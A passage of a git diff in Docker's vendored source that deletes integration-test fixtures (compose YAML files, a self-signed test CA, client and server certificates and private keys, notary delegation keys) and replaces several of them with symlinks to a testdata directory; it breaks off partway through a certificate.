-    image: busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0
-    command: "tail -f /dev/null"
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/remove.yaml b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/remove.yaml
deleted file mode 100644
index 4ec8cacc9b..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/remove.yaml
+++ /dev/null
@@ -1,11 +0,0 @@
-
-version: "3.1"
-services:
-  web:
-    image: busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0
-    command: top
-    secrets:
-      - special
-secrets:
-  special:
-    file: fixtures/secrets/default
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/secrets.yaml b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/secrets.yaml
deleted file mode 100644
index 6ac92cddee..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/secrets.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-
-version: "3.1"
-services:
-  web:
-    image: busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0
-    command: top
-    secrets:
-      - special
-      - source: super
-        target: foo.txt
-        mode: 0400
-      - star
-secrets:
-  special:
-    file: fixtures/secrets/default
-  super:
-    file: fixtures/secrets/default
-  star:
-    external:
-      name: outside
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem
deleted file mode 100644
index 6825d6d1bd..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem
+++ /dev/null
@@ -1,23 +0,0 @@
------BEGIN CERTIFICATE-----
-MIID0TCCAzqgAwIBAgIJAP2r7GqEJwSnMA0GCSqGSIb3DQEBBQUAMIGiMQswCQYD
-VQQGEwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMG
-A1UEChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTERMA8GA1UEAxMI
-Y2hhbmdlbWUxETAPBgNVBCkTCGNoYW5nZW1lMR8wHQYJKoZIhvcNAQkBFhBtYWls
-QGhvc3QuZG9tYWluMB4XDTEzMTIwMzE2NTYzMFoXDTIzMTIwMTE2NTYzMFowgaIx
-CzAJBgNVBAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2Nv
-MRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24xETAPBgNVBAsTCGNoYW5nZW1lMREwDwYD
-VQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEW
-EG1haWxAaG9zdC5kb21haW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALAn
-0xDw+5y7ZptQacq66pUhRu82JP2WU6IDgo5QUtNU6/CX5PwQATe/OnYTZQFbksxp
-AU9boG0FCkgxfsgPYXEuZxVEGKI2fxfKHOZZI8mrkWmj6eWU/0cvCjGVc9rTITP5
-sNQvg+hORyVDdNp2IdsbMJayiB3AQYMFx3vSDOMTAgMBAAGjggELMIIBBzAdBgNV
-HQ4EFgQUZu7DFz09q0QBa2+ymRm9qgK1NPswgdcGA1UdIwSBzzCBzIAUZu7DFz09
-q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJD
-QTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24x
-ETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMI
-Y2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21haW6CCQD9q+xq
-hCcEpzAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBAF8fJKKM+/oOdnNi
-zEd0M1+PmZOyqvjYQn/2ZR8UHH6Imgc/OPQKZXf0bVE1Txc/DaUNn9Isd1SuCuaE
-ic3vAIYYU7PmgeNN6vwec48V96T7jr+GAi6AVMhQEc2hHCfVtx11Xx+x6aHDZzJt
-Zxtf5lL6KSO9Y+EFwM+rju6hm5hW
------END CERTIFICATE-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem
new file mode 120000
index 0000000000..70a3e6ce54
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem
@@ -0,0 +1 @@
+../../../integration/testdata/https/ca.pem
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem
deleted file mode 100644
index c05ed47c2c..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem
+++ /dev/null
@@ -1,73 +0,0 @@
-Certificate:
-    Data:
-        Version: 3 (0x2)
-        Serial Number: 3 (0x3)
-    Signature Algorithm: sha1WithRSAEncryption
-        Issuer: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=changeme/name=changeme/emailAddress=mail@host.domain
-        Validity
-            Not Before: Dec  4 14:17:54 2013 GMT
-            Not After : Dec  2 14:17:54 2023 GMT
-        Subject: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=client/name=changeme/emailAddress=mail@host.domain
-        Subject Public Key Info:
-            Public Key Algorithm: rsaEncryption
-                Public-Key: (1024 bit)
-                Modulus:
-                    00:ca:c9:05:d0:09:4e:3e:a4:fc:d5:14:f4:a5:e8:
-                    34:d3:6b:51:e3:f3:62:ea:a1:f0:e8:ed:c4:2a:bc:
-                    f0:4f:ca:07:df:e3:88:fa:f4:21:99:35:0e:3d:ea:
-                    b0:86:e7:c4:d2:8a:83:2b:42:b8:ec:a3:99:62:70:
-                    81:46:cc:fc:a5:1d:d2:63:e8:eb:07:25:9a:e2:25:
-                    6d:11:56:f2:1a:51:a1:b6:3e:1c:57:32:e9:7b:2c:
-                    aa:1b:cc:97:2d:89:2d:b1:c9:5e:35:28:4d:7c:fa:
-                    65:31:3e:f7:70:dd:6e:0b:3c:58:af:a8:2e:24:c0:
-                    7e:4e:78:7d:0a:9e:8f:42:43
-                Exponent: 65537 (0x10001)
-        X509v3 extensions:
-            X509v3 Basic Constraints: 
-                CA:FALSE
-            Netscape Comment: 
-                Easy-RSA Generated Certificate
-            X509v3 Subject Key Identifier: 
-                DE:42:EF:2D:98:A3:6C:A8:AA:E0:8C:71:2C:9D:64:23:A9:E2:7E:81
-            X509v3 Authority Key Identifier: 
-                keyid:66:EE:C3:17:3D:3D:AB:44:01:6B:6F:B2:99:19:BD:AA:02:B5:34:FB
-                DirName:/C=US/ST=CA/L=SanFrancisco/O=Fort-Funston/OU=changeme/CN=changeme/name=changeme/emailAddress=mail@host.domain
-                serial:FD:AB:EC:6A:84:27:04:A7
-
-            X509v3 Extended Key Usage: 
-                TLS Web Client Authentication
-            X509v3 Key Usage: 
-                Digital Signature
-    Signature Algorithm: sha1WithRSAEncryption
-         1c:44:26:ea:e1:66:25:cb:e4:8e:57:1c:f6:b9:17:22:62:40:
-         12:90:8f:3b:b2:61:7a:54:94:8f:b1:20:0b:bf:a3:51:e3:fa:
-         1c:a1:be:92:3a:d0:76:44:c0:57:83:ab:6a:e4:1a:45:49:a4:
-         af:39:0d:60:32:fc:3a:be:d7:fb:5d:99:7a:1f:87:e7:d5:ab:
-         84:a2:5e:90:d8:bf:fa:89:6d:32:26:02:5e:31:35:68:7f:31:
-         f5:6b:51:46:bc:af:70:ed:5a:09:7d:ec:b2:48:4f:fe:c5:2f:
-         56:04:ad:f6:c1:d2:2a:e4:6a:c4:87:fe:08:35:c5:38:cb:5e:
-         4a:c4
------BEGIN CERTIFICATE-----
-MIIEFTCCA36gAwIBAgIBAzANBgkqhkiG9w0BAQUFADCBojELMAkGA1UEBhMCVVMx
-CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xFTATBgNVBAoTDEZv
-cnQtRnVuc3RvbjERMA8GA1UECxMIY2hhbmdlbWUxETAPBgNVBAMTCGNoYW5nZW1l
-MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0LmRv
-bWFpbjAeFw0xMzEyMDQxNDE3NTRaFw0yMzEyMDIxNDE3NTRaMIGgMQswCQYDVQQG
-EwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMGA1UE
-ChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTEPMA0GA1UEAxMGY2xp
-ZW50MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0
-LmRvbWFpbjCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAyskF0AlOPqT81RT0
-peg002tR4/Ni6qHw6O3EKrzwT8oH3+OI+vQhmTUOPeqwhufE0oqDK0K47KOZYnCB
-Rsz8pR3SY+jrByWa4iVtEVbyGlGhtj4cVzLpeyyqG8yXLYktscleNShNfPplMT73
-cN1uCzxYr6guJMB+Tnh9Cp6PQkMCAwEAAaOCAVkwggFVMAkGA1UdEwQCMAAwLQYJ
-YIZIAYb4QgENBCAWHkVhc3ktUlNBIEdlbmVyYXRlZCBDZXJ0aWZpY2F0ZTAdBgNV
-HQ4EFgQU3kLvLZijbKiq4IxxLJ1kI6nifoEwgdcGA1UdIwSBzzCBzIAUZu7DFz09
-q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJD
-QTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24x
-ETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMI
-Y2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21haW6CCQD9q+xq
-hCcEpzATBgNVHSUEDDAKBggrBgEFBQcDAjALBgNVHQ8EBAMCB4AwDQYJKoZIhvcN
-AQEFBQADgYEAHEQm6uFmJcvkjlcc9rkXImJAEpCPO7JhelSUj7EgC7+jUeP6HKG+
-kjrQdkTAV4OrauQaRUmkrzkNYDL8Or7X+12Zeh+H59WrhKJekNi/+oltMiYCXjE1
-aH8x9WtRRryvcO1aCX3sskhP/sUvVgSt9sHSKuRqxIf+CDXFOMteSsQ=
------END CERTIFICATE-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem
new file mode 120000
index 0000000000..458882026e
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem
@@ -0,0 +1 @@
+../../../integration/testdata/https/client-cert.pem
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem
deleted file mode 100644
index b5c15f8dc7..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem
+++ /dev/null
@@ -1,16 +0,0 @@
------BEGIN PRIVATE KEY-----
-MIICdQIBADANBgkqhkiG9w0BAQEFAASCAl8wggJbAgEAAoGBAMrJBdAJTj6k/NUU
-9KXoNNNrUePzYuqh8OjtxCq88E/KB9/jiPr0IZk1Dj3qsIbnxNKKgytCuOyjmWJw
-gUbM/KUd0mPo6wclmuIlbRFW8hpRobY+HFcy6XssqhvMly2JLbHJXjUoTXz6ZTE+
-93Ddbgs8WK+oLiTAfk54fQqej0JDAgMBAAECgYBOFEzKp2qbMEexe9ofL2N3rDDh
-xkrl8OijpzkLA6i78BxMFn4dsnZlWUpciMrjhsYAExkiRRSS+QMMJimAq1jzQqc3
-FAQV2XGYwkd0cUn7iZGvfNnEPysjsfyYQM+m+sT0ATj4BZjVShC6kkSjTdm1leLN
-OSvcHdcu3Xxg9ufF0QJBAPYdnNt5sIndt2WECePuRVi+uF4mlxTobFY0fjn26yhC
-4RsnhhD3Vldygo9gvnkwrAZYaALGSPBewes2InxvjA8CQQDS7erKiNXpwoqz5XiU
-SVEsIIVTdWzBjGbIqMOu/hUwM5FK4j6JTBks0aTGMyh0YV9L1EzM0X79J29JahCe
-iQKNAkBKNMOGqTpBV0hko1sYDk96YobUXG5RL4L6uvkUIQ7mJMQam+AgXXL7Ctuy
-v0iu4a38e8tgisiTMP7nHHtpaXihAkAOiN54/lzfMsykANgCP9scE1GcoqbP34Dl
-qttxH4kOPT9xzY1JoLjLYdbc4YGUI3GRpBt2sajygNkmUey7P+2xAkBBsVCZFvTw
-qHvOpPS2kX5ml5xoc/QAHK9N7kR+X7XFYx82RTVSqJEK4lPb+aEWn+CjiIewO4Q5
-ksDFuNxAzbhl
------END PRIVATE KEY-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem
new file mode 120000
index 0000000000..d5f6bbee57
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem
@@ -0,0 +1 @@
+../../../integration/testdata/https/client-key.pem
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem
deleted file mode 100644
index 08abfd1a3b..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem
+++ /dev/null
@@ -1,76 +0,0 @@
-Certificate:
-    Data:
-        Version: 3 (0x2)
-        Serial Number: 4 (0x4)
-    Signature Algorithm: sha1WithRSAEncryption
-        Issuer: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=changeme/name=changeme/emailAddress=mail@host.domain
-        Validity
-            Not Before: Dec  4 15:01:20 2013 GMT
-            Not After : Dec  2 15:01:20 2023 GMT
-        Subject: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=*/name=changeme/emailAddress=mail@host.domain
-        Subject Public Key Info:
-            Public Key Algorithm: rsaEncryption
-                Public-Key: (1024 bit)
-                Modulus:
-                    00:c1:ff:7d:30:6f:64:4a:b1:92:b1:71:d1:c1:74:
-                    e2:1d:db:2d:11:24:e1:00:d4:00:ae:6f:c8:9e:ae:
-                    67:b3:4a:bd:f7:e6:9e:57:6d:19:4c:3c:23:94:2d:
-                    3d:d6:63:84:d8:fa:76:2b:38:12:c1:ed:20:9d:32:
-                    e0:e8:c2:bf:9a:77:70:04:3f:7f:ca:8c:2c:82:d6:
-                    3d:25:5c:02:1a:4f:64:93:03:dd:9c:42:97:5e:09:
-                    49:af:f0:c2:e1:30:08:0e:21:46:95:d1:13:59:c0:
-                    c8:76:be:94:0d:8b:43:67:21:33:b2:08:60:9d:76:
-                    a8:05:32:1e:f9:95:09:14:75
-                Exponent: 65537 (0x10001)
-        X509v3 extensions:
-            X509v3 Basic Constraints: 
-                CA:FALSE
-            Netscape Cert Type: 
-                SSL Server
-            Netscape Comment: 
-                Easy-RSA Generated Server Certificate
-            X509v3 Subject Key Identifier: 
-                14:02:FD:FD:DD:13:38:E0:71:EA:D1:BE:C0:0E:89:1A:2D:B6:19:06
-            X509v3 Authority Key Identifier: 
-                keyid:66:EE:C3:17:3D:3D:AB:44:01:6B:6F:B2:99:19:BD:AA:02:B5:34:FB
-                DirName:/C=US/ST=CA/L=SanFrancisco/O=Fort-Funston/OU=changeme/CN=changeme/name=changeme/emailAddress=mail@host.domain
-                serial:FD:AB:EC:6A:84:27:04:A7
-
-            X509v3 Extended Key Usage: 
-                TLS Web Server Authentication
-            X509v3 Key Usage: 
-                Digital Signature, Key Encipherment
-    Signature Algorithm: sha1WithRSAEncryption
-         40:0f:10:39:c4:b7:0f:0d:2f:bf:d2:16:cc:8e:d3:9a:fb:8b:
-         ce:4b:7b:0d:48:77:ce:f1:fe:d5:8f:ea:b1:71:ed:49:1d:9f:
-         23:3a:16:d4:70:7c:c5:29:bf:e4:90:34:d0:f0:00:24:f4:e4:
-         df:2c:c3:83:01:66:61:c9:a8:ab:29:e7:98:6d:27:89:4a:76:
-         c9:2e:19:8e:fe:6e:d5:f8:99:11:0e:97:67:4b:34:e3:1e:e3:
-         9f:35:00:a5:32:f9:b5:2c:f2:e0:c5:2e:cc:81:bd:18:dd:5c:
-         12:c8:6b:fa:0c:17:74:30:55:f6:6e:20:9a:6c:1e:09:b4:0c:
-         15:42
------BEGIN CERTIFICATE-----
-MIIEKjCCA5OgAwIBAgIBBDANBgkqhkiG9w0BAQUFADCBojELMAkGA1UEBhMCVVMx
-CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xFTATBgNVBAoTDEZv
-cnQtRnVuc3RvbjERMA8GA1UECxMIY2hhbmdlbWUxETAPBgNVBAMTCGNoYW5nZW1l
-MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0LmRv
-bWFpbjAeFw0xMzEyMDQxNTAxMjBaFw0yMzEyMDIxNTAxMjBaMIGbMQswCQYDVQQG
-EwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMGA1UE
-ChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTEKMAgGA1UEAxQBKjER
-MA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21h
-aW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMH/fTBvZEqxkrFx0cF04h3b
-LREk4QDUAK5vyJ6uZ7NKvffmnldtGUw8I5QtPdZjhNj6dis4EsHtIJ0y4OjCv5p3
-cAQ/f8qMLILWPSVcAhpPZJMD3ZxCl14JSa/wwuEwCA4hRpXRE1nAyHa+lA2LQ2ch
-M7IIYJ12qAUyHvmVCRR1AgMBAAGjggFzMIIBbzAJBgNVHRMEAjAAMBEGCWCGSAGG
-+EIBAQQEAwIGQDA0BglghkgBhvhCAQ0EJxYlRWFzeS1SU0EgR2VuZXJhdGVkIFNl
-cnZlciBDZXJ0aWZpY2F0ZTAdBgNVHQ4EFgQUFAL9/d0TOOBx6tG+wA6JGi22GQYw
-gdcGA1UdIwSBzzCBzIAUZu7DFz09q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJ
-BgNVBAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUw
-EwYDVQQKEwxGb3J0LUZ1bnN0b24xETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQD
-EwhjaGFuZ2VtZTERMA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1h
-aWxAaG9zdC5kb21haW6CCQD9q+xqhCcEpzATBgNVHSUEDDAKBggrBgEFBQcDATAL
-BgNVHQ8EBAMCBaAwDQYJKoZIhvcNAQEFBQADgYEAQA8QOcS3Dw0vv9IWzI7TmvuL
-zkt7DUh3zvH+1Y/qsXHtSR2fIzoW1HB8xSm/5JA00PAAJPTk3yzDgwFmYcmoqynn
-mG0niUp2yS4Zjv5u1fiZEQ6XZ0s04x7jnzUApTL5tSzy4MUuzIG9GN1cEshr+gwX
-dDBV9m4gmmweCbQMFUI=
------END CERTIFICATE-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem
new file mode 120000
index 0000000000..c18601067a
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem
@@ -0,0 +1 @@
+../../../integration/testdata/https/server-cert.pem
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem
deleted file mode 100644
index c269320ef0..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem
+++ /dev/null
@@ -1,16 +0,0 @@
------BEGIN PRIVATE KEY-----
-MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBAMH/fTBvZEqxkrFx
-0cF04h3bLREk4QDUAK5vyJ6uZ7NKvffmnldtGUw8I5QtPdZjhNj6dis4EsHtIJ0y
-4OjCv5p3cAQ/f8qMLILWPSVcAhpPZJMD3ZxCl14JSa/wwuEwCA4hRpXRE1nAyHa+
-lA2LQ2chM7IIYJ12qAUyHvmVCRR1AgMBAAECgYAmwckb9RUfSwyYgLm8IYLPHiuJ
-wkllZfVg5Bo7gXJcQnFjZmJ56uTj8xvUjZlODIHM63TSO5ibv6kFXtXKCqZGd2M+
-wGbhZ0f+2GvKcwMmJERnIQjuoNaYSQLT0tM0VB9Iz0rJlZC+tzPZ+5pPqEumRdsS
-IzWNXfF42AhcbwAQYQJBAPVXtMYIJc9EZsz86ZcQiMPWUpCX5vnRmtwL8kKyR8D5
-4KfYeiowyFffSRMMcclwNHq7TgSXN+nIXM9WyzyzwikCQQDKbNA28AgZp9aT54HP
-WnbeE2pmt+uk/zl/BtxJSoK6H+69Jec+lf7EgL7HgOWYRSNot4uQWu8IhsHLTiUq
-+0FtAkEAqwlRxRy4/x24bP+D+QRV0/D97j93joFJbE4Hved7jlSlAV4xDGilwlyv
-HNB4Iu5OJ6Gcaibhm+FKkmD3noHSwQJBAIpu3fokLzX0bS+bDFBU6qO3HXX/47xj
-+tsfQvkwZrSI8AkU6c8IX0HdVhsz0FBRQAT2ORDQz1XCarfxykNZrwUCQQCGCBIc
-BBCWzhHlswlGidWJg3HqqO6hPPClEr3B5G87oCsdeYwiO23XT6rUnoJXfJHp6oCW
-5nCwDu5ZTP+khltg
------END PRIVATE KEY-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem
new file mode 120000
index 0000000000..48b9c2df65
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem
@@ -0,0 +1 @@
+../../../integration/testdata/https/server-key.pem
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.crt b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.crt
deleted file mode 100644
index 2218f23c89..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.crt
+++ /dev/null
@@ -1,21 +0,0 @@
------BEGIN CERTIFICATE-----
-MIIDhTCCAm2gAwIBAgIJAP2EcMN2UXPcMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNV
-BAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMQ8wDQYD
-VQQKEwZEb2NrZXIxEzARBgNVBAMTCmRlbGVnYXRpb24wHhcNMTYwOTI4MTc0ODQ4
-WhcNMjYwNjI4MTc0ODQ4WjBXMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT
-BgNVBAcTDFNhbkZyYW5jaXNjbzEPMA0GA1UEChMGRG9ja2VyMRMwEQYDVQQDEwpk
-ZWxlZ2F0aW9uMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvgewhaYs
-Ke5s2AM7xxKrT4A6n7hW17qSnBjonCcPcwTFmYqIOdxWjYITgJuHrTwB4ZhBqWS7
-tTsUUu6hWLMeB7Uo5/GEQAAZspKkT9G/rNKF9lbWK9PPhGGkeR01c/Q932m92Hsn
-fCQ0Pp/OzD3nVTh0v9HKk+PObNMOCcqG87eYs4ylPRxs0RrE/rP+bEGssKQSbeCZ
-wazDnO+kiatVgKQZ2CK23iFdRE1z2rzqVDeaFWdvBqrRdWnkOZClhlLgEQ5nK2yV
-B6tSqOiI3MmHyHzIkGOQJp2/s7Pe0ckEkzsjTsJW8oKHlBBl6pRxHIKzNN4VFbeB
-vvYvrogrDrC/owIDAQABo1QwUjAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF
-oDATBgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUFoHfukRa6qGk1ncON64Z
-ASKlZdkwDQYJKoZIhvcNAQELBQADggEBAEq9Adpd03CPmpbRtTAJGAkjjLFr60sV
-2r+/l/m9R31ZCN9ymM9nxToQ8zfMdeAh/nnPcErziil2gDVqXueCNDkRj09tmDIE
-Q1Oc92uyNZNgcECow77cKZCTZSTku+qsJrYaykH5vSnia8ltcKj8inJedIcpBR+p
-608HEQvF0Eg5eaLPJwH48BCb0Gqdri1dJgrNnqptz7MDr8M+u7tHVulbAd3YxLlq
-JH1W2bkVUx6esbn/MUE5HL5iTuOYREEINvBSmLdmmFkampmCnCB/bDEyJeL9bAkt
-ZPIi0UNSnqFKLSP1Vf8AGLXt6iO7+1OGvtsDXEEYdXVOMsSXZtUuT7A=
------END CERTIFICATE-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.key b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.key
deleted file mode 100644
index cb37efc94a..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.key
+++ /dev/null
@@ -1,27 +0,0 @@
------BEGIN RSA PRIVATE KEY-----
-MIIEpAIBAAKCAQEAvgewhaYsKe5s2AM7xxKrT4A6n7hW17qSnBjonCcPcwTFmYqI
-OdxWjYITgJuHrTwB4ZhBqWS7tTsUUu6hWLMeB7Uo5/GEQAAZspKkT9G/rNKF9lbW
-K9PPhGGkeR01c/Q932m92HsnfCQ0Pp/OzD3nVTh0v9HKk+PObNMOCcqG87eYs4yl
-PRxs0RrE/rP+bEGssKQSbeCZwazDnO+kiatVgKQZ2CK23iFdRE1z2rzqVDeaFWdv
-BqrRdWnkOZClhlLgEQ5nK2yVB6tSqOiI3MmHyHzIkGOQJp2/s7Pe0ckEkzsjTsJW
-8oKHlBBl6pRxHIKzNN4VFbeBvvYvrogrDrC/owIDAQABAoIBAB/o8KZwsgfUhqh7
-WoViSCwQb0e0z7hoFwhpUl4uXPTGf1v6HEgDDPG0PwwgkdbwNaypQZVtWevj4NTQ
-R326jjdjH1xbfQa2PZpz722L3jDqJR6plEtFxRoIv3KrCffPsrgabIu2mnnJJpDB
-ixtW5cq0sT4ov2i4H0i85CWWwbSY/G/MHsvCuK9PhoCj9uToVqrf1KrAESE5q4fh
-mPSYUL99KVnj7SZkUz+79rc8sLLPVks3szZACMlm1n05ZTj/d6Nd2ZZUO45DllIj
-1XJghfWmnChrB/P/KYXgQ3Y9BofIAw1ra2y3wOZeqRFNsbmojcGldfdtN/iQzhEj
-uk4ThokCgYEA9FTmv36N8qSPWuqX/KzkixDQ8WrDGohcB54kK98Wx4ijXx3i38SY
-tFjO8YUS9GVo1+UgmRjZbzVX7xeum6+TdBBwOjNOxEQ4tzwiQBWDdGpli8BccdJ2
-OOIVxSslWhiUWfpYloXVetrR88iHbT882g795pbonDaJdXSLnij4UW8CgYEAxxrr
-QFpsmOEZvI/yPSOGdG7A1RIsCeH+cEOf4cKghs7+aCtAHlIweztNOrqirl3oKI1r
-I0zQl46WsaW8S/y99v9lmmnZbWwqLa4vIu0NWs0zaZdzKZw3xljMhgp4Ge69hHa2
-utCtAxcX+7q/yLlHoTiYwKdxX54iLkheCB8csw0CgYEAleEG820kkjXUIodJ2JwO
-Tihwo8dEC6CeI6YktizRgnEVFqH0rCOjMO5Rc+KX8AfNOrK5PnD54LguSuKSH7qi
-j04OKgWTSd43lF90+y63RtCFnibQDpp2HwrBJAQFk7EEP/XMJfnPLN/SbuMSADgM
-kg8kPTFRW5Iw3DYz9z9WpE0CgYAkn6/8Q2XMbUOFqti9JEa8Lg8sYk5VdwuNbPMA
-3QMYKQUk9ieyLB4c3Nik3+XCuyVUKEc31A5egmz3umu7cn8i6vGuiJ/k/8t2YZ7s
-Bry5Ihu95Yzab5DW3Eiqs0xKQN79ebS9AluAwQO5Wy2h52rknfuDHIm/M+BHsSoS
-xl5KFQKBgQCokCsYuX1z2GojHw369/R2aX3ovCGuHqy4k7fWxUrpHTHvth2+qNPr
-84qLJ9rLWoZE5sUiZ5YdwCgW877EdfkT+v4aaBX79ixso5VdqgJ/PdnoNntah/Vq
-njQiW1skn6/P5V/eyimN2n0VsyBr/zMDEtYTRP/Tb1zi/njFLQkZEA==
------END RSA PRIVATE KEY-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.crt b/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.crt
deleted file mode 100644
index bec084790a..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.crt
+++ /dev/null
@@ -1,21 +0,0 @@
------BEGIN CERTIFICATE-----
-MIIDhTCCAm2gAwIBAgIJAIq8naKlYAQfMA0GCSqGSIb3DQEBCwUAMFcxCzAJBgNV
-BAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMQ8wDQYD
-VQQKEwZEb2NrZXIxEzARBgNVBAMTCmRlbGVnYXRpb24wHhcNMTYwOTI4MTc0ODQ4
